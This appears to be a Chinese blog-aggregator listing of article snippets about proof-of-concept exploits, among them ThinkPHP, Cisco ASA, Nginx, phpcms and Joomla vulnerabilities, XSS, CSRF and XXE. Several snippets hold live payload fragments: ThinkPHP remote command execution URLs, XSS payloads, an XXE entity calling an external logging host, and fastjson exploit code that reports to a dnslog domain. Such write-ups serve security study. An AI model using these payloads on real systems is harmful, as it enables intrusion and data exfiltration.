ICode9

精准搜索请尝试: 精确搜索
  • POC、EXP、SRC概念厘清2020-10-12 11:00:46

    「POC」 POC可以看成是一段验证的代码,就像是一个证据,能够证明漏洞的真实性,能证明漏洞的存在即可。     https://zhuanlan.zhihu.com/p/26832890 「EXP」 EXP(Exploit):中文直译为“漏洞利用”,简单点讲,就是通过EXP能够实现漏洞的利用价值。比如某个系统存在SQL注入漏洞,我们可以编写

  • CVE-2020-3452 CISCO ASA远程任意文件读取 poc2020-07-23 07:01:15

    简介 Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信

  • phpstudy 后门批量验证[golang]2020-06-29 09:04:01

    三分热度的我觉得[go]有点意思,就学了学。写个POC来玩一玩

  • csrf攻击实例2020-06-07 18:53:48

    CSRF漏洞 CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery) 原理: 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; ​ 2. 在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; ​ 3. 用户未退出

  • ECharts画分类甘特图2020-06-06 18:42:29

    项目最近做任务排产,需要绘画甘特图,并且每两份一组,做了一个JQuery快速做了POC,实现了大部分功能,后来持续开发,做到了划定当前时间,任务多了后固定左侧列和顶部坐标轴行等等。 分享博客的话就简单的分享一下做的POC吧。实现的初步效果如下 分析: 左侧的轴样式美观程度比较高,且

  • Nginx读取缓存-CVE-2017-75292020-05-20 12:42:34

    影响范围: Nginx 0.5.6 - 1.13.2 复现: //下载poc C:\Users\17273\Downloads\wordpress46-learn-master>git clone https://github.com/en0f/CVE-2017-7529_PoC Cloning into 'CVE-2017-7529_PoC'... remote: Enumerating objects: 6, done. remote: Total 6 (delta

  • phpcms9.6.0任意文件上传漏洞(CVE-2018-14399)2020-03-25 19:57:05

    0x00:前言 PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。 可以直接前台getshell。 phpcms 9.6.0 0x01:漏洞测试 1.1 浏览器访问

  • thinkphp6 session 任意文件创建漏洞POC2020-03-25 11:02:20

    ThinkPHP6.0.0-6.0.1。 thinkphp6 session 任意文件创建漏洞POC https://www.uedbox.com/post/65126/  https://www.php.cn/phpkj/thinkphp/441727.html

  • TeamViewer 13.0.5058中的权限漏洞测试2020-03-07 14:53:57

    0x00 前言 12月5日,TeamViewer发布新版本13.0.5640,修复了之前版本13.0.5058中的一个bug。 随后,gellin在github上传了该漏洞的POC,安全信息网站ThreatPost对这个情况作了报道。 但一眼看上去,该漏洞的描述和POC较难理解,于是,本文对其做了进一步测试,验证POC,得出结论 POC: https://github

  • Joomla 3.4.6远程代码执行漏洞原理分析和poc2020-03-05 19:04:41

    Joomla 3.4.6远程代码执行漏洞原理分析和poc 免责声明:本文中提到的漏洞利用Poc和脚本仅供研究学习使用,请遵守《网络安全法》等相关法律法规。 事件背景 上周,意大利安全公司 Hacktive Security的研究员 Alessandro Groppo 公开了影响 Joomla 内容管理系统老旧版本 3.0.0 至 3.4.6 (

  • ThinkPHP 5.1.x远程命令执行漏洞利用, 参考POC2020-02-28 17:01:07

      thinkphp5.1.1为例 1、代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1       2、命令执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=system&data=dir        

  • 21.过狗一句话2019-12-21 21:55:43

    看了一些大佬的做题方法,做一下小小总结: 要知道的小知识: explode() 函数把字符串打散为数组,$poc_1=assert; assert() 任意代码执行,打印当前目录 1.使用?s=print_r(scandir('./'))进行目录扫描以发现代码的执行漏洞 2.也可以通过查看所有的文件的方式? s=print_r(glob('*.*'

  • 0day Poc编写指南(实战篇)2019-12-15 10:00:11

    为了证明某些人无脑喷咱家脚本hacker小子,所以呢,有必要证明一下,咱家也是有实力去写POC的,只是不喜欢花时间重复造轮子而已,POC还是喜欢用PY来写,别问我为什么不用Csharp,方便某些玩Linux的小伙伴,嗯嗯,跨平台移植性的一个问题首先呢,小编在某站点有幸得到某编写好的POC,该POC针对dedecms V

  • fastjson ping外带信息poc2019-12-07 10:54:15

    public class Exploit { public Exploit(){ String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址 String win_dnslog = "windows" + base_url; // windows try{ String[] commands = { "cmd"

  • 2019-11-14:ThinkPHP 2.x 任意代码执行漏洞,复现2019-11-14 09:57:59

    *文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implod

  • linux CVE-2019-13272 本地特权漏洞2019-10-29 12:55:21

    漏洞描述 在5.1.17之前的Linux内核中,kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程删除权限并调用execve(可能允许攻击者控制)。 一个影响因素是对象寿命问题(也可能导致

  • JavaScript表单提交一个名为submit的字段2019-09-25 19:34:27

    我想知道是否有任何方法(使用JS或其他方法)自动提交带有名称和标识为“提交”的字段的表单.基本上,我的整个HTML代码如下所示: <html> <body onload=myForm.submit()> <form id="myForm" name="myForm" action="http://example.com/examplePage.do" method="POST"> <

  • Lava为什么可以在PoC项目中脱颖而出2019-09-25 14:06:23

    PoW、PoS、DPoS...想必这些共识,大家或多或少都有所了解。那么,对于现在市场上风声最大的PoC,你知道多少呢? PoC即Proof of Capacity容量证明机制。它的运作方式对比PoW可谓是十分讨巧,矿工首先在自己的硬盘内写入大量的随机数,然后在每一次要挖最新的区块时,通过“扫盘”的方式搜寻

  • [POC] Customizing Existing Classes2019-09-10 13:54:48

    Objects should have clearly-defined tasks, such as modeling specific information, displaying visual content or controlling the flow of information. As you’ve already seen, a class interface defines the ways in which others are expected to interact with an

  • 什么是POC(容量证明)硬盘挖矿机,未来区块链应用新趋势?2019-09-10 11:56:44

    PoW是工作量证明,PoS是权益证明,DPoS是委托权权益证明,但PoC是一种怎么样的共识机制? PoC是Proof of Capacity的缩写,称之为容量证明机制,它是POW 共识机制的一种,它是以硬盘作为共识参与者,它的特点是牺牲性能获得安全可信,相对POW 减少了非常多的安全和信任成本,更低成本解决了全局信任和安

  • YottaChain专业矿机-芝麻云节点2019-09-06 14:56:24

    人类正在步入数据时代。如今,全球每天就产生超过500亿GB是数据,据IDC预测,到2025年这一数字将超过4000亿GB。YottaChain由国际顶级科学家王东临带领的专业团队打造,通过连接分散的存储资源,打造一个具有自修复能力的规模浩瀚的全球共享的统一存储池,并能确保每个人的数据主权,比现有中心化

  • 推动社会进步的区块链新时代要来临了2019-09-02 16:55:54

    YottaChain由国际顶级科学家带领的专业团队打造,通过连接分散的存储资源,构成一个具有自修复能力的规模浩瀚的全球共享的统一存储池,并能确保每个人的数据主权,在存储效率、数据可靠性、数据安全性和降低存储成本等方面都做到极致。POC共识算法开创了硬盘挖矿模式的先河。POC(proof of c

  • XSS漏洞的poc与exp2019-09-01 11:03:30

    poc <script>alert('xss')</script>  最简单常用的poc <a href='' onclick=alert('xss')">type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗 <img src=http://1.1.1.1/a.ipg onerror=alert('xss')> 加载图片,给一个

  • 华为云kafka POC 踩坑记录2019-09-01 09:00:24

    华为云kafka POC 踩坑记录 2019/03/08 18:29 最近在进行华为云相关POC验证,个人主要负责华为云DMS kafka相关。 大致数据流程是,从DIS取出数据,进行解析处理,然后放入kafka,再从kafka中取出数据然后放到ElasticSearch以及OBS里面。 kafka作为中间层次,发挥着中间件的重要作用。关于

  • xxe盲注踩坑2019-08-07 18:53:08

              今天审计某php语言的cms,发现一个xxe,原理很简单,但是用他读取文件时踩了个坑,记录一下 使用ceye平台接收下 poc: <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://ckcvlb.ceye.io/xxe_test">%remote;]><root

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有